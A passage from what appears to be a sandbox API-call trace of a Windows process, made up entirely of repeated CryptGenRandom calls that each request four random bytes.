dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.727] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.728] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.728] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.728] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.728] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.728] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.728] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.728] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.728] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.728] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.728] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.728] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.728] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.728] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.728] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.728] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.728] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.728] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.728] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.728] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.728] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.728] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.728] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.728] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.728] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.728] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.728] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.728] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.728] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.728] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.728] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.728] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.728] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.728] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.728] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.728] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.728] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.728] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.728] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.728] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.728] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.728] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.728] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.728] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.728] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.728] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.728] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.728] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.728] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.728] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.728] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.729] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.729] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.729] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.729] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.729] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.729] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.729] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.729] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.729] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.729] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.729] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.729] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.729] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.729] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.729] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.729] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.729] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.729] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.729] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.729] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.729] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.729] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.729] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.729] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.729] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.729] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.729] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.729] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.729] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.729] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.729] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.729] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.729] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.729] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.729] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.729] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.729] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.729] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.729] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.729] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.729] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.729] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.729] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.729] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.729] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.729] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.729] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.729] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.729] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.729] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.729] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.730] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.730] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.730] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.730] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.730] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.730] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.730] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.730] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.730] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.730] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.730] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.730] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.730] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.730] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.730] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.730] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.730] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.730] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.730] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.730] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.730] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.730] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.730] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.730] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.730] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.730] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.730] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.730] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.730] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.730] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.730] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.730] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.730] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.730] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.730] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.730] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.730] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.730] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.730] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.730] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.730] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.730] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.730] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.730] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.730] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.730] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.730] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7dc70 | out: pbBuffer=0x2d7dc70) returned 1 [0158.730] 